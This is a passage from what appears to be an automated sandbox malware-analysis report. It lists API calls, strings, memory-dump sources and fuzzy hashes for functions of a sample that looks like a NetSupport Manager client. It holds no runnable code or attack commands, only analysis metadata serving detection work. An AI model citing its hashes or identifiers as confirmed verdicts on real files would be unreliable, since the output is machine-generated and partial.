                                                                                      • Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                      • Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9
                                                                                      Function 11145AE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                        • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                        • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                        • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                      • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
                                                                                      • FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                      • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                      • API String ID: 1108920153-1959555903
                                                                                      • Opcode ID: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                      • Instruction ID: 699a5c6b52ff0bb6954823876d42b720b76b3255f49526743c1f98bd9e848574
                                                                                      • Opcode Fuzzy Hash: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                      • Instruction Fuzzy Hash: 67F0A03A70022877E21416BAAC08F9ABB5A8BC8A75F140230F928D69C0EB51C90086B5
                                                                                      Function 11031870 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 11031926
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                      • String ID: %s%s.bin$051829$clientinv.cpp$m_pDoInv == NULL
                                                                                      • API String ID: 4180936305-3347479217
                                                                                      • Opcode ID: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                      • Instruction ID: 64da4217f7417b153db366359b1c36bd372b32cb55e7c28d29c46c6ec3487e21
                                                                                      • Opcode Fuzzy Hash: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                      • Instruction Fuzzy Hash: 5421A1B9E04709AFD710CF65DC81BAAB7F4FB88718F40453EE86597680EB35A9008B65
                                                                                      Function 11144670 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNEL32(11144D48,00000000,?,11144D48,00000000), ref: 1114468C
                                                                                      • __strdup.LIBCMT ref: 111446A7
                                                                                        • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                        • Part of subcall function 11144670: _free.LIBCMT ref: 111446CE
                                                                                      • _free.LIBCMT ref: 111446DC
                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                      • CreateDirectoryA.KERNEL32(11144D48,00000000,?,?,?,11144D48,00000000), ref: 111446E7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                      • String ID:
                                                                                      • API String ID: 398584587-0
                                                                                      • Opcode ID: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                      • Instruction ID: 9245e394badc27c9d68c775c1ae1103ae8f1f8453310ecf51c29309078bed6c3
                                                                                      • Opcode Fuzzy Hash: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                      • Instruction Fuzzy Hash: F4016D7A7441065BF301197D7C057ABBB8C8F82AADF144032F89DC3D80F752E41682A1
                                                                                      Function 1100ED70 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EDA2
                                                                                        • Part of subcall function 11160824: _setlocale.LIBCMT ref: 11160836
                                                                                      • _free.LIBCMT ref: 1100EDB4
                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                      • _free.LIBCMT ref: 1100EDC7
                                                                                      • _free.LIBCMT ref: 1100EDDA
                                                                                      • _free.LIBCMT ref: 1100EDED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                      • String ID:
                                                                                      • API String ID: 3515823920-0
                                                                                      • Opcode ID: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                      • Instruction ID: 71b49ece8787e94f553dd036e4ff5c8d0ec16ff98238e97fea1187b5179b4c62
                                                                                      • Opcode Fuzzy Hash: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                      • Instruction Fuzzy Hash: E61190B1D046109BD620DF599C40A5BF7FCEB44754F144A2AE456D3780E672F900CB91
                                                                                      Function 11145910 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                        • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                        • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                      • wsprintfA.USER32 ref: 1114593E
                                                                                      • wsprintfA.USER32 ref: 11145954
                                                                                        • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                        • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                        • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                      • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                      • API String ID: 3779116287-2600120591
                                                                                      • Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                      • Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
                                                                                      • Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                      • Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4
                                                                                      Function 11143230 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                      • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile$CloseHandle
                                                                                      • String ID: "
                                                                                      • API String ID: 1443461169-123907689
                                                                                      • Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                      • Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
                                                                                      • Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                      • Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750
                                                                                      Function 1102D0D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,A1BC2D8B,74DF2EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                      • String ID: Client$DisableGeolocation
                                                                                      • API String ID: 3315423714-4166767992
                                                                                      • Opcode ID: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                      • Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
                                                                                      • Opcode Fuzzy Hash: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                      • Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785
                                                                                      Function 110271B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA
                                                                                        • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                        • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                        • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                        • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                      • TranslateMessage.USER32(?), ref: 110271F0
                                                                                      • DispatchMessageA.USER32(?), ref: 110271F6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                      • String ID: Exit Msgloop, quit=%d
                                                                                      • API String ID: 3212272093-2210386016
                                                                                      • Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                      • Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
                                                                                      • Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                      • Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1
                                                                                      Function 110173F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 110173FD
                                                                                        • Part of subcall function 11017300: WaitForSingleObject.KERNEL32(00000300,000000FF), ref: 1101733C
                                                                                        • Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
                                                                                        • Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                        • Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0
                                                                                        • Part of subcall function 11017220: WaitForSingleObject.KERNEL32(00000300,000000FF), ref: 11017252
                                                                                        • Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                        • Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                        • Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0
                                                                                      • SetEvent.KERNEL32(00000300), ref: 1101741D
                                                                                      • GetTickCount.KERNEL32 ref: 11017423
                                                                                      Strings
                                                                                      • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                      • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                      • API String ID: 3804766296-4122679463
                                                                                      • Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                      • Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
